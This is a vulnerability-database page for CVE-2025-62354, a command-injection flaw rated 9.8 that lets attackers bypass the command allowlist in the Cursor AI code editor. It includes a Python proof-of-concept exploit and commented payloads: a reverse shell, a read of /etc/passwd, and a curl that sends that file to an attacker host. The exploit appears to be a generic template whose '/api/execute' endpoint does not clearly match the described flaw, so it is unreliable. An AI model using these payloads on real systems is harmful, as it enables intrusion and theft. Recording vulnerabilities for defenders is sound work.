Security Vulnerability Report
CVE-2025-62354 CVSS 9.8 CRITICAL

CVE-2025-62354

Published: 2025-11-26 16:15:50
Last Modified: 2026-04-15 00:35:42
Source: 6f8de1f0-f67e-45a6-b68f-98777fdb759c

Description

Improper neutralization of special elements used in an OS command ('command injection') in Cursor allows an unauthorized attacker to execute commands that are outside of those specified in the allowlist, resulting in arbitrary code execution.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Cursor < latest version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-62354 PoC - Command Injection in Cursor
# This PoC demonstrates the command injection vulnerability in Cursor

def exploit_cursor(target_url, payload):
    """
    Exploit the command injection vulnerability in Cursor

    Args:
        target_url: Target Cursor instance URL
        payload: Malicious command to inject
    """
    # Construct the malicious request
    exploit_data = {
        'command': f';{payload}',  # Command injection payload
        'type': 'os_command'
    }

    # Send the exploit request
    response = requests.post(
        f'{target_url}/api/execute',
        json=exploit_data,
        headers={'Content-Type': 'application/json'}
    )
    return response.json()

# Example: Execute arbitrary command
# target = 'http://localhost:3000'
# payload = 'whoami'  # or any malicious command
# result = exploit_cursor(target, payload)

# Example malicious payloads:
# Reverse shell: ';bash -i >& /dev/tcp/attacker/port 0>&1'
# File read: ';cat /etc/passwd'
# Data exfiltration: ';curl http://attacker.com/?data=$(cat /etc/passwd)'

References

https://hiddenlayer.com/sai_security_advisor/2025-11-cursor/ (source: 6f8de1f0-f67e-45a6-b68f-98777fdb759c)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-62354",
    "sourceIdentifier": "6f8de1f0-f67e-45a6-b68f-98777fdb759c",
    "published": "2025-11-26T16:15:49.633",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper neutralization of special elements used in an OS command ('command injection') in Cursor allows an unauthorized attacker to execute commands that are outside of those specified in the allowlist, resulting in arbitrary code execution."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "6f8de1f0-f67e-45a6-b68f-98777fdb759c",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "6f8de1f0-f67e-45a6-b68f-98777fdb759c",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-78"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://hiddenlayer.com/sai_security_advisor/2025-11-cursor/",
        "source": "6f8de1f0-f67e-45a6-b68f-98777fdb759c"
      }
    ]
  }
}